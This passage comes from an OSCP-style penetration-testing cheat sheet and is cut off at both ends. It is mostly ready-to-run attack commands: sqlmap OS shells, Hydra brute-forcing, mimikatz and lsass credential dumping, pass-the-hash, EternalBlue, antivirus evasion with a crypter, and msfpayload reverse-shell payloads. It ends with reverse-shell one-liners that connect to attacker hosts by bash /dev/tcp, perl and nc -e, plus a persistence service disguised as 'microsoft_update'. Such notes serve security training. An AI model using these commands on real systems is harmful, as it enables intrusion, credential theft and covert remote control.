--tables ` - Dump table data from a specific database and table `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump ` - Specify parameter to exploit `sqlmap --dbms=mysql -u "http://www.example.com/param1=value1&param2=value2" --dbs -p param2 ` - Specify parameter to exploit in 'nice' URIs (exploits param1) `sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs ` - Get OS shell `sqlmap --dbms=mysql -u "$URL" --os-shell` - Get SQL shell `sqlmap --dbms=mysql -u "$URL" --sql-shell` - SQL query `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"` - Use Tor Socks5 proxy `sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs` - **NoSQLMap Examples** You may encounter NoSQL instances like MongoDB in your OSCP journies (`/cgi-bin/mongo/2.2.3/dbparse.py`). NoSQLMap can help you to automate NoSQLDatabase enumeration. - NoSQLMap Installation ```bash git clone https://github.com/codingo/NoSQLMap.git cd NoSQLMap/ ls pip install couchdb pip install pbkdf2 pip install ipcalc python nosqlmap.py ``` - Often you can create an exception dump message with MongoDB using a malformed NoSQLQuery such as: `a'; return this.a != 'BadData’'; var dummy='!` - Password Attacks -------------------------------------------------------------------------------------------------------------- - AES Decryption http://aesencryption.net/ - Convert multiple webpages into a word list ```bash for x in 'index' 'about' 'post' 'contact' ; do \ curl http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >> webapp.txt ; \ done ``` - Or convert html to word list dict `html2dic index.html.out | sort -u > index-html.dict` - Default Usernames and Passwords - CIRT [*http://www.cirt.net/passwords*](http://www.cirt.net/passwords) - Government Security - Default Logins and Passwords for Networked Devices - [*http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php*](http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php) - Virus.org [*http://www.virus.org/default-password/*](http://www.virus.org/default-password/) - Default Password [*http://www.defaultpassword.com/*](http://www.defaultpassword.com/) - Brute Force - Nmap Brute forcing Scripts [*https://nmap.org/nsedoc/categories/brute.html*](https://nmap.org/nsedoc/categories/brute.html) - Nmap Generic auto detect brute force attack: `nmap --script brute -Pn <target.com or ip>` - MySQL nmap brute force attack: `nmap --script=mysql-brute $ip` - Dictionary Files - Word lists on Kali `cd /usr/share/wordlists` - Key-space Brute Force - `crunch 6 6 0123456789ABCDEF -o crunch1.txt` - `crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha` - `crunch 8 8 -t ,@@^^%%%` - Pwdump and Fgdump - Security Accounts Manager (SAM) - `pwdump.exe` - attempts to extract password hashes - `fgdump.exe` - attempts to kill local antiviruses before attempting to dump the password hashes and cached credentials. - Windows Credential Editor (WCE) - allows one to perform several attacks to obtain clear text passwords and hashes. Usage: `wce -w` - Mimikatz - extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets [*https://github.com/gentilkiwi/mimikatz*](https://github.com/gentilkiwi/mimikatz) From metasploit meterpreter (must have System level access): ``` meterpreter> load mimikatz meterpreter> help mimikatz meterpreter> msv meterpreter> kerberos meterpreter> mimikatz_command -f samdump::hashes meterpreter> mimikatz_command -f sekurlsa::searchPasswords ``` - Password Profiling - cewl can generate a password list from a web page `cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt` - Password Mutating - John the ripper can mutate password lists nano /etc/john/john.conf `john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt` - Medusa - Medusa, initiated against an htaccess protected web directory `medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10` - Ncrack - ncrack (from the makers of nmap) can brute force RDP `ncrack -vv --user offsec -P password-file.txt rdp://$ip` - Hydra - Hydra brute force against SNMP `hydra -P password-file.txt -v $ip snmp` - Hydra FTP known user and rockyou password list `hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp` - Hydra SSH using list of users and passwords `hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh` - Hydra SSH using a known password and a username list `hydra -v -V -u -L users.txt -p "<known password>" -t 1 -u $ip ssh` - Hydra SSH Against Known username on port 22 `hydra $ip -s 22 ssh -l <user> -P big_wordlist.txt` - Hydra POP3 Brute Force `hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V` - Hydra SMTP Brute Force `hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V` - Hydra attack http get 401 login with a dictionary `hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin` - Hydra attack Windows Remote Desktop with rockyou `hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip` - Hydra brute force SMB user with rockyou: `hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb` - Hydra brute force a Wordpress admin login `hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'` - <span id="_bnmnt83v58wk" class="anchor"><span id="_Toc480741822" class="anchor"></span></span>Password Hash Attacks ------------------------------------------------------------------------------------------------------------------- - Online Password Cracking [*https://crackstation.net/*](https://crackstation.net/) [*http://finder.insidepro.com/*](http://finder.insidepro.com/) - Hashcat Needed to install new drivers to get my GPU Cracking to work on the Kali linux VM and I also had to use the --force parameter. `apt-get install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev` and `apt-get install pocl-opencl-icd` Cracking Linux Hashes - /etc/shadow file ``` 500 | md5crypt $1$, MD5(Unix) | Operating-Systems 3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems 7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems 1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems ``` Cracking Windows Hashes ``` 3000 | LM | Operating-Systems 1000 | NTLM | Operating-Systems ``` Cracking Common Application Hashes ``` 900 | MD4 | Raw Hash 0 | MD5 | Raw Hash 5100 | Half MD5 | Raw Hash 100 | SHA1 | Raw Hash 10800 | SHA-384 | Raw Hash 1400 | SHA-256 | Raw Hash 1700 | SHA-512 | Raw Hash ``` Create a .hash file with all the hashes you want to crack puthasheshere.hash: `$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/` Hashcat example cracking Linux md5crypt passwords $1$ using rockyou: `hashcat --force -m 500 -a 0 -o found1.txt --remove puthasheshere.hash /usr/share/wordlists/rockyou.txt` Wordpress sample hash: `$P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/` Wordpress clear text: `test` Hashcat example cracking Wordpress passwords using rockyou: `hashcat --force -m 400 -a 0 -o found1.txt --remove wphash.hash /usr/share/wordlists/rockyou.txt` - Sample Hashes [*http://openwall.info/wiki/john/sample-hashes*](http://openwall.info/wiki/john/sample-hashes) - Identify Hashes `hash-identifier` - To crack linux hashes you must first unshadow them: `unshadow passwd-file.txt shadow-file.txt` `unshadow passwd-file.txt shadow-file.txt > unshadowed.txt` - John the Ripper - Password Hash Cracking - `john $ip.pwdump` - `john --wordlist=/usr/share/wordlists/rockyou.txt hashes` - `john --rules --wordlist=/usr/share/wordlists/rockyou.txt` - `john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt` - JTR forced descrypt cracking with wordlist `john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt` - JTR forced descrypt brute force cracking `john --format=descrypt hash --show` - Passing the Hash in Windows - Use Metasploit to exploit one of the SMB servers in the labs. Dump the password hashes and attempt a pass-the-hash attack against another system: `export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896 ` `pth-winexe -U administrator //$ip cmd` <span id="_6nmbgmpltwon" class="anchor"><span id="_Toc480741823" class="anchor"></span></span>Networking, Pivoting and Tunneling ================================================================================================================================ - Port Forwarding - accept traffic on a given IP address and port and redirect it to a different IP address and port - `apt-get install rinetd` - `cat /etc/rinetd.conf` ``` # bindadress bindport connectaddress connectport w.x.y.z 53 a.b.c.d 80 ``` - SSH Local Port Forwarding: supports bi-directional communication channels - `ssh <gateway> -L <local port to listen>:<remote host>:<remote port>` - SSH Remote Port Forwarding: Suitable for popping a remote shell on an internal non routable network - `ssh <gateway> -R <remote port to bind>:<local host>:<local port>` - SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local attacking box to tunnel ALL incoming traffic to ANY host in the DMZ network on ANY PORT - `ssh -D <local proxy port> -p <remote port> <target>` - Proxychains - Perform nmap scan within a DMZ from an external computer - Create reverse SSH tunnel from Popped machine on :2222 `ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com` `ssh -f -N -R 2222:<local host>:22 root@<remote host>` - Create a Dynamic application-level port forward on 8080 thru 2222 `ssh -f -N -D <local host>:8080 -p 2222 hax0r@<remote host>` - Leverage the SSH SOCKS server to perform Nmap scan on network using proxy chains `proxychains nmap --top-ports=20 -sT -Pn $ip/24` - HTTP Tunneling `nc -vvn $ip 8888` - Traffic Encapsulation - Bypassing deep packet inspection - http tunnel On server side: `sudo hts -F <server ip addr>:<port of your app> 80 ` On client side: `sudo htc -P <my proxy.com:proxy port> -F <port of your app> <server ip addr>:80 stunnel` - Tunnel Remote Desktop (RDP) from a Popped Windows machine to your network - Tunnel on port 22 `plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>` - Port 22 blocked? Try port 80? or 443? `plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P80` - Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel (bypass deep packet inspection) - Windows machine add required firewall rules without prompting the user - `netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes` - `netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000` - `netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080` - `netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079` - Start the http tunnel client `httptunnel_client.exe` - Create HTTP reverse shell by connecting to localhost port 3000 `plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P 3000` - VLAN Hopping - ```bash git clone https://github.com/nccgroup/vlan-hopping.git chmod 700 frogger.sh ./frogger.sh ``` - VPN Hacking - Identify VPN servers: `./udp-protocol-scanner.pl -p ike $ip` - Scan a range for VPN servers: `./udp-protocol-scanner.pl -p ike -f ip.txt` - Use IKEForce to enumerate or dictionary attack VPN servers: `pip install pyip` `git clone https://github.com/SpiderLabs/ikeforce.git ` Perform IKE VPN enumeration with IKEForce: `./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic ` Bruteforce IKE VPN using IKEForce: `./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1 ` Use ike-scan to capture the PSK hash: ```bash ike-scan ike-scan TARGET-IP ike-scan -A TARGET-IP ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key ike-scan –M –A –n example\_group -P hash-file.txt TARGET-IP ``` Use psk-crack to crack the PSK hash ```bash psk-crack hash-file.txt pskcrack psk-crack -b 5 TARGET-IPkey psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key psk-crack -d /path/to/dictionary-file TARGET-IP-key ``` - PPTP Hacking - Identifying PPTP, it listens on TCP: 1723 NMAP PPTP Fingerprint: `nmap –Pn -sV -p 1723 TARGET(S) ` PPTP Dictionary Attack `thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst` - Port Forwarding/Redirection - PuTTY Link tunnel - SSH Tunneling - Forward remote port to local address: `plink.exe -P 22 -l root -pw "1337" -R 445:<local host>:445 <remote host>` - SSH Pivoting - SSH pivoting from one network to another: `ssh -D <local host>:1010 -p 22 user@<remote host>` - DNS Tunneling - dnscat2 supports “download” and “upload” commands for getting iles (data and programs) to and from the target machine. - Attacking Machine Installation: ```bash apt-get update apt-get -y install ruby-dev git make g++ gem install bundler git clone https://github.com/iagox86/dnscat2.git cd dnscat2/server bundle install ``` - Run dnscat2: ``` ruby ./dnscat2.rb dnscat2> New session established: 1422 dnscat2> session -i 1422 ``` - Target Machine: [*https://downloads.skullsecurity.org/dnscat2/*](https://downloads.skullsecurity.org/dnscat2/) [*https://github.com/lukebaggett/dnscat2-powershell/*](https://github.com/lukebaggett/dnscat2-powershell/) `dnscat --host <dnscat server ip>` <span id="_ujpvtdpc9i67" class="anchor"><span id="_Toc480741824" class="anchor"></span></span>The Metasploit Framework ====================================================================================================================== - See [*Metasploit Unleashed Course*](https://www.offensive-security.com/metasploit-unleashed/) in the Essentials - Search for exploits using Metasploit GitHub framework source code: [*https://github.com/rapid7/metasploit-framework*](https://github.com/rapid7/metasploit-framework) Translate them for use on OSCP LAB or EXAM. - Metasploit - MetaSploit requires Postfresql `systemctl start postgresql` - To enable Postgresql on startup `systemctl enable postgresql` - MSF Syntax - Start metasploit `msfconsole ` `msfconsole -q` - Show help for command `show -h` - Show Auxiliary modules `show auxiliary` - Use a module ``` use auxiliary/scanner/snmp/snmp_enum use auxiliary/scanner/http/webdav_scanner use auxiliary/scanner/smb/smb_version use auxiliary/scanner/ftp/ftp_login use exploit/windows/pop3/seattlelab_pass ``` - Show the basic information for a module `info` - Show the configuration parameters for a module `show options` - Set options for a module ``` set RHOSTS 192.168.1.1-254 set THREADS 10 ``` - Run the module `run` - Execute an Exploit `exploit` - Search for a module `search type:auxiliary login` - Metasploit Database Access - Show all hosts discovered in the MSF database `hosts` - Scan for hosts and store them in the MSF database `db_nmap` - Search machines for specific ports in MSF database `services -p 443` - Leverage MSF database to scan SMB ports (auto-completed rhosts) `services -p 443 --rhosts` - Staged and Non-staged - Non-staged payload - is a payload that is sent in its entirety in one go - Staged - sent in two parts Not have enough buffer space Or need to bypass antivirus - MS 17-010 - EternalBlue - You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video: [*https://www.youtube.com/watch?v=4OHLor9VaRI*](https://www.youtube.com/watch?v=4OHLor9VaRI) 1. First step is to configure the Kali to work with wine 32bit dpkg --add-architecture i386 && apt-get update && apt-get install wine32 rm -r ~/.wine wine cmd.exe exit 2. Download the exploit repostory `https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit` 3. Move the exploit to `/usr/share/metasploit-framework/modules/exploits/windows/smb` or `~/.msf4/modules/exploits/windows/smb` 4. Start metasploit console - I found that using spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes. ``` use exploit/windows/smb/eternalblue_doublepulsar msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10 RHOST => 10.10.10.10 msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe PROCESSINJECT => spoolsv.exe msf exploit(eternalblue_doublepulsar) > run ``` - Experimenting with Meterpreter - Get system information from Meterpreter Shell `sysinfo` - Get user id from Meterpreter Shell `getuid` - Search for a file `search -f *pass*.txt` - Upload a file `upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec` - Download a file `download c:\\Windows\\system32\\calc.exe /tmp/calc.exe` - Invoke a command shell from Meterpreter Shell `shell` - Exit the meterpreter shell `exit` - Metasploit Exploit Multi Handler - multi/handler to accept an incoming reverse\_https\_meterpreter ``` payload use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_https set LHOST $ip set LPORT 443 exploit [*] Started HTTPS reverse handler on https://$ip:443/ ``` - Building Your Own MSF Module - ```bash mkdir -p ~/.msf4/modules/exploits/linux/misc cd ~/.msf4/modules/exploits/linux/misc cp /usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb ./crossfire.rb nano crossfire.rb ``` - Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities) - `download` Download a file or directory `upload` Upload a file or directory `portfwd` Forward a local port to a remote service `route` View and modify the routing table `keyscan_start` Start capturing keystrokes `keyscan_stop` Stop capturing keystrokes `screenshot` Grab a screenshot of the interactive desktop `record_mic` Record audio from the default microphone for X seconds `webcam_snap` Take a snapshot from the specified webcam `getsystem` Attempt to elevate your privilege to that of local system. `hashdump` Dumps the contents of the SAM database - Meterpreter Post Exploitation Features - Create a Meterpreter background session `background` <span id="_51btodqc88s2" class="anchor"><span id="_Toc480741825" class="anchor"></span></span>Bypassing Antivirus Software =========================================================================================================================== - Crypting Known Malware with Software Protectors - One such open source crypter, called Hyperion ```bash cp /usr/share/windows-binaries/Hyperion-1.0.zip unzip Hyperion-1.0.zip cd Hyperion-1.0/ i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll . cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll . wine hyperion.exe ../backdoor.exe ../crypted.exe ``` ## Nmap Full Web Vulnerable Scan: mkdir /usr/share/nmap/scripts/vulscan cd /usr/share/nmap/scripts/vulscan wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz nmap -sS -sV –script=vulscan/vulscan.nse target nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target nmap -PN -sS -sV –script=vulscan –script-args vulscancorrelation=1 -p80 target nmap -sV –script=vuln target nmap -PN -sS -sV –script=all –script-args vulscancorrelation=1 target ## Dirb Directory Bruteforce: dirb http://IP:PORT dirbuster-ng-master/wordlists/common.txt ## Nikto Scanner: nikto -C all -h http://IP ## WordPress Scanner: wpscan –url http://IP/ –enumerate p ## Uniscan Scanning: uniscan.pl -u target -qweds ## HTTP Enumeration: httprint -h http://www.example.com -s signatures.txt ## SKIP Fish Scanner: skipfish -m 5 -LVY -W /usr/share/skipfish/dictionaries/complete.wl -u http://IP ## Uniscan Scanning: uniscan –u http://www.hubbardbrook.org –qweds -q – Enable Directory checks -w – Enable File Checks -e – Enable robots.txt and sitemap.xml check -d – Enable Dynamic checks -s – Enable Static checks ## Skipfish Scanning: m-time threads -LVY donot update after result skipfish -m 5 -LVY -W /usr/share/skipfish/dictionaries/complete.wl -u http://IP ## Nmap Ports Scan: 1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys) 2)fargement 3)data packed – like orginal one not scan packet 4)use auxiliary/scanner/ip/ipidseq for find zombie ip in network to use them to scan — nmap -sI ip target 5) nmap –source-port 53 target nmap -sS -sV -D IP1,IP2,IP3,IP4,IP5 -f –mtu=24 –data-length=1337 -T2 target ( Randomize scan form diff IP) nmap -Pn -T2 -sV –randomize-hosts IP1,IP2 nmap –script smb-check-vulns.nse -p445 target (using NSE scripts) nmap -sU -P0 -T Aggressive -p123 target (Aggresive Scan T1-T5) nmap -sA -PN -sN target nmap -sS -sV -T5 -F -A -O target (version detection) nmap -sU -v target (Udp) nmap -sU -P0 (Udp) nmap -sC 192.168.31.10-12 (all scan default) ## Netcat Scanning: nc -v -w 1 target -z 1-1000 for i in {10..12}; do nc -vv -n -w 1 192.168.34.$i 21-25 -z; done ## US Scanning: us -H -msf -Iv 192.168.31.20 -p 1-65535 && us -H -mU -Iv 192.168.31.20 -p 1-65535 ## Unicornscan Scanning: unicornscan X.X.X.X:a -r10000 -v ## Kernel Scanning: xprobe2 -v -p tcp:80:open 192.168.6.66 ## Samba Enumeartion: nmblookup -A target smbclient //MOUNT/share -I target -N rpcclient -U “” target enum4linux target ## SNMP ENumeration: snmpget -v 1 -c public IP version snmpwalk -v 1 -c public IP snmpbulkwalk -v 2 -c public IP ## Windows Useful commands: net localgroup Users net localgroup Administrators search dir/s *.doc system(“start cmd.exe /k $cmd”) sc create microsoft_update binpath=”cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe” start= auto error= ignore /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779 mimikatz.exe “privilege::debug” “log” “sekurlsa::logonpasswords” Procdump.exe -accepteula -ma lsass.exe lsass.dmp mimikatz.exe “sekurlsa::minidump lsass.dmp” “log” “sekurlsa::logonpasswords” C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp For 32 bits C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp For 64 bits ## Plink Tunnel: plink.exe -P 22 -l root -pw “1234” -R 445:127.0.0.1:445 X.X.X.X Enable RDP Access: reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0 netsh firewall set service remoteadmin enable netsh firewall set service remotedesktop enable Turn Off Firewall: netsh firewall set opmode disable ## Meterpreter: run getgui -u admin -p 1234 run vnc -p 5043 ## Add User Windows: net user test 1234 /add net localgroup administrators test /add ## Mimikatz: privilege::debug sekurlsa::logonPasswords full ## Passing the Hash: pth-winexe -U hash //IP cmd ## Password Cracking using Hashcat: hashcat -m 400 -a 0 hash /root/rockyou.txt ## Netcat commands: c:> nc -l -p 31337 #nc 192.168.0.10 31337 c:> nc -v -w 30 -p 31337 -l < secret.txt #nc -v -w 2 192.168.0.10 31337 > secret.txt ## Banner Grabbing: nc 192.168.0.10 80 GET / HTTP/1.1 Host: 192.168.0.10 User-Agent: SPOOFED-BROWSER Referrer: K0NSP1RACY.COM <enter> <enter> ## window reverse shell: c:>nc -Lp 31337 -vv -e cmd.exe nc 192.168.0.10 31337 c:>nc rogue.k0nsp1racy.com 80 -e cmd.exe nc -lp 80 #nc -lp 31337 -e /bin/bash nc 192.168.0.11 31337 nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000 ## Find all SUID root files: find / -user root -perm -4000 -print ## Find all SGID root files: find / -group root -perm -2000 -print ## Find all SUID and SGID files owned by anyone: find / -perm -4000 -o -perm -2000 -print ## Find all files that are not owned by any user: find / -nouser -print ## Find all files that are not owned by any group: find / -nogroup -print ## Find all symlinks and what they point to: find / -type l -ls ## Python: python -c ‘import pty;pty.spawn(“/bin/bash”)’ python -m SimpleHTTPServer (Starting HTTP Server) ## PID: fuser -nv tcp 80 (list PID of process) fuser -k -n tcp 80 (Kill Process of PID) ## Hydra: hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp (Self Explanatory) Mount Remote Windows Share: smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw ## Compiling Exploit in Kali: gcc -m32 -o output32 hello.c (32 bit) gcc -o output hello.c (64 bit) ## Compiling Windows Exploits on Kali: cd /root/.wine/drive_c/MinGW/bin wine gcc -o ability.exe /tmp/exploit.c -lwsock32 wine ability.exe ## NASM Command: nasm -f bin -o payload.bin payload.asm nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload ## SSH Pivoting: ssh -D 127.0.0.1:1080 -p 22 user@IP Add socks4 127.0.0.1 1080 in /etc/proxychains.conf proxychains commands target ## Pivoting to One Network to Another: ssh -D 127.0.0.1:1080 -p 22 user1@IP1 Add socks4 127.0.0.1 1080 in /etc/proxychains.conf proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2 Add socks4 127.0.0.1 1081 in /etc/proxychains.conf proxychains commands target ## Pivoting Using metasploit: route add 10.1.1.0 255.255.255.0 1 route add 10.2.2.0 255.255.255.0 1 use auxiliary/server/socks4a run proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E ## Exploit-DB search using CSV File: searchsploit-rb –update searchsploit-rb -t webapps -s WEBAPP searchsploit-rb –search=”Linux Kernel” searchsploit-rb -a “author name” -s “exploit name” searchsploit-rb -t remote -s “exploit name” searchsploit-rb -p linux -t local -s “exploit name” ## For Privilege Escalation Exploit search: cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep “<|<=” | sort -k3 ## Metasploit Payloads: msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 X > system.exe msfpayload php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R > exploit.php msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R | msfencode -t asp -o file.asp msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b “\x00″ -t c ## Create a Linux Reverse Meterpreter Binary msfpayload linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -t elf -o shell Create Reverse Shell (Shellcode) msfpayload windows/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -b “\x00\x0a\x0d” Create a Reverse Shell Python Script msfpayload cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.py Create a Reverse ASP Shell msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -t asp -o shell.asp Create a Reverse Bash Shell msfpayload cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.sh ## Create a Reverse PHP Shell msfpayload php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.php Edit shell.php in a text editor to add <?php at the beginning. Create a Windows Reverse Meterpreter Binary msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X >shell.exe ## Security Commands In Linux: ### find programs with a set uid bit find / -uid 0 -perm -4000 ### find things that are world writable find / -perm -o=w ### find names with dots and spaces, there shouldn’t be any find / -name ” ” -print find / -name “..” -print find / -name “. ” -print find / -name ” ” -print ### find files that are not owned by anyone find / -nouser ### look for files that are unlinked lsof +L1 ### get information about procceses with open ports lsof -i ### look for weird things in arp arp -a ### look at all accounts including AD getent passwd ### look at all groups and membership including AD getent group ### list crontabs for all users including AD for user in $(getent passwd|cut -f1 -d:); do echo “### Crontabs for $user ####”; crontab -u $user -l; done ### generate random passwords cat /dev/urandom| tr -dc ‘a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=’|fold -w 12| head -n 4 ### find all immutable files, there should not be any find . | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’ ### fix immutable files chattr -i file ## Windows Buffer Overflow Exploitation Commands: msfpayload windows/shell_bind_tcp R | msfencode -a x86 -b “\x00″ -t c msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b “\x00″ -t c ### COMMONLY USED BAD CHARACTERS: \x00\x0a\x0d\x20 For http request \x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c Ending with (0\n\r_) ### Useful Commands: pattern create pattern offset (EIP Address) pattern offset (ESP Address) add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode ) !pvefindaddr pattern_create 5000 !pvefindaddr suggest !pvefindaddr modules !pvefindaddr nosafeseh !mona config -set workingfolder C:\Mona\%p !mona config -get workingfolder !mona mod !mona bytearray -b “\x00\x0a” !mona pc 5000 !mona po EIP !mona suggest ## SEH: !mona suggest !mona nosafeseh nseh=”\xeb\x06\x90\x90″ (next seh chain) iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN) ## ROP (DEP): !mona modules !mona ropfunc -m *.dll -cpb “\x00\x09\x0a’ !mona rop -m *.dll -cpb “\x00\x09\x0a’ (auto suggest) ## ASLR: !mona noaslr ## EGG Hunter: !mona jmp -r esp !mona egg -t lxxl \xeb\xc4 (jump backward -60) buff=lxxllxxl+shell !mona egg -t ‘w00t’ ## GDB Debugger Commands: Setting Breakpoint : break *_start ### Execute Next Instruction : next step n s ### Continue Execution : continue c ### Data : checking ‘REGISTERS’ and ‘MEMORY’ Display Register Values : (Decimal , Binary , Hex ) print /d –> Decimal print /t –> Binary print /x –> Hex O/P : (gdb) print /d $eax $17 = 13 (gdb) print /t $eax $18 = 1101 (gdb) print /x $eax $19 = 0xd (gdb) Display values of specific memory locations : command : x/nyz (Examine) n –> Number of fields to display ==> y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal) z –> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit) ## Cheat Codes: ## Reverse Shellcode: ## BASH: bash -i >& /dev/tcp/192.168.23.10/443 0>&1 exec /bin/bash 0&0 2>&0 exec /bin/bash 0&0 2>&0 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done /bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1 /bin/bash -i > /dev/tcp/192.168.23.10/443 0<&1 2>&1 ## PERL: Shorter Perl reverse shell that does not depend on /bin/sh: perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’ perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’ If the target system is running Windows use the following one-liner: perl -MIO -e ‘$c=new 